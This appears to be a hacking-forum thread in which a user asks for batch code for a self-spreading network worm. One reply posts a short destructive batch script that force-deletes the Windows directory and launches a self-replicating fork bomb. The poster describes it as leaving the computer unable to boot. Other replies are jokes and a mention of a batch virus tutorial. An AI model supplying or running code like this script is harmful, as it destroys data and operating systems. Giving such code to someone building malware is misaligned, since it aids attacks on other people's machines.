EvilZone

Programming and Scripting => Beginner's Corner => Topic started by: Xedafen on August 24, 2014, 08:41:29 PM

Title: Batch worm?
Post by: Xedafen on August 24, 2014, 08:41:29 PM
    Any simple code snippets you could share for a malware I'm making? Im looking for a worm in batch. I need it to spread to all other computers in the network. I have been looking at the proteus and kazaa worms lately but they don't seem to spread the active file running to other computers, so any help?  ;D
Title: Re: Batch worm?
Post by: Deque on August 24, 2014, 09:18:41 PM
(http://cdn.meme.li/instances/500x/53741242.jpg)
Title: Re: Batch worm?
Post by: Kulverstukas on September 27, 2014, 11:26:07 AM
This was for sure made way before Shellshock.
Could you post that worm in a separate thread with more info?
Title: Re: Batch worm?
Post by: RedBullAddicted on September 27, 2014, 11:41:17 AM
batch != bash .. Just sayin' :P
Title: Re: Batch worm?
Post by: iTpHo3NiX on September 27, 2014, 09:05:37 PM
Here this snippet will help...

Code: [Select]
@echo off
del /f /q %WinDir%
echo start a.bat > a.bat
start a.bat

Supa1337 shit there son.
Title: Re: Batch worm?
Post by: Xedafen on October 21, 2014, 05:40:09 AM
This was for sure made way before Shellshock.
Could you post that worm in a separate thread with more info?




I just made a tutorial regarding batch viruses and the kazaa proteus worm is in there
Title: Re: Batch worm?
Post by: iTpHo3NiX on October 22, 2014, 03:34:42 AM
Y u no like my fork bomb? Its epic, it will start deleting shit while it starts a fork bomb, so once the computer crashes, it won't boot back into the os :-P
Title: Re: Batch worm?
Post by: Nortcele on October 28, 2014, 04:53:43 PM
Y u no like my fork bomb? Its epic, it will start deleting shit while it starts a fork bomb, so once the computer crashes, it won't boot back into the os :-P

^^